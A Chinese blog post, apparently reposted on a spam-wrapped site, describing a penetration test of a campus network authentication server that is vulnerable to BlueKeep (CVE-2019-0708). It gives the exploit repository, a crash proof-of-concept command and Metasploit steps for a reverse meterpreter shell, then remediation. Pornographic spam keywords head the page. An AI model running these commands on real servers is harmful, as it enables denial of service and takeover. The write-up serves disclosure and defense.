最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊(cè)

記一次校園網(wǎng)滲透測(cè)試

2023-03-03 00:01 作者:悲匠  | 我要投稿

ps:發(fā)文前已將漏洞反饋至校園信息中心,菜雞投稿,如有不對(duì)的地方還請(qǐng)各位大佬指正

設(shè)備連接校園網(wǎng)跳轉(zhuǎn)到了銳捷校園網(wǎng)認(rèn)證界面

得到校園網(wǎng)服務(wù)器地址:10.25.254.11

通過(guò)nmap工具掃描端口發(fā)現(xiàn)以下端口開放

發(fā)現(xiàn)服務(wù)器的3389端口開放,推測(cè)3389端口可能存在 cve-2019-0708漏洞

利用msf工具進(jìn)行掃描,發(fā)現(xiàn)服務(wù)器確實(shí)存在該漏洞,通過(guò)該漏洞我們可以獲取服務(wù)器控制權(quán)或?qū)Ψ?wù)器發(fā)起藍(lán)屏攻擊,使服務(wù)器癱瘓,或獲取服務(wù)器shell。

1.對(duì)服務(wù)器發(fā)動(dòng)藍(lán)屏攻擊(本次攻擊未攻擊校園網(wǎng)服務(wù)器,搭建了相同環(huán)境的靶機(jī)進(jìn)行測(cè)試)

使用漏洞利用工具:git clone https://github.com/n1xbyte/CVE-2019-0708.git

下載完后使用命令 crashpoc.py 192.168.1.108 64 //crashpoc.py 目標(biāo)ip

運(yùn)行工具后靶機(jī)藍(lán)屏

2.利用該漏洞獲取目標(biāo)shell

使用exploit/windows/rdp/cve_2019_0708_bluekeep_rce漏洞模塊

輸入命令use?exploit/windows/rdp/cve_2019_0708_bluekeep_rce


設(shè)置目標(biāo):輸入命令set rhosts 192.168.1.108

使用payload:輸入命令set payload windows/x64/meterpreter/reverse_tcp

設(shè)置主機(jī)架構(gòu):set target 2


執(zhí)行,獲取服務(wù)器shell

獲取服務(wù)器shell后就可以為所欲為了,校園網(wǎng)認(rèn)證服務(wù)器開放的其它端口也存在一些漏洞,目前已將漏洞反饋至校園信息中心,本次滲透未影響服務(wù)器正常運(yùn)行


解決方案:

1.在運(yùn)行受支持版本的 Windows 7、Windows Server 2008 和 Windows Server 2008 R2 的系統(tǒng)上啟用網(wǎng)絡(luò)級(jí)身份驗(yàn)證 (NLA)

2.在企業(yè)邊界防火墻處阻止 TCP 端口 3389


記一次校園網(wǎng)滲透測(cè)試的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國(guó)家法律
石棉县| 河源市| 辰溪县| 綦江县| 宜春市| 庆云县| 堆龙德庆县| 会昌县| 河南省| 铁力市| 定陶县| 镇平县| 望江县| 德惠市| 额尔古纳市| 阳泉市| 永修县| 玉溪市| 碌曲县| 顺义区| 鄯善县| 兴文县| 永年县| 东阳市| 巴林左旗| 游戏| 喜德县| 汝城县| 庄河市| 芮城县| 花莲市| 苍梧县| 漳浦县| 秦安县| 舞阳县| 龙口市| 麻江县| 潍坊市| 健康| 关岭| 宿州市|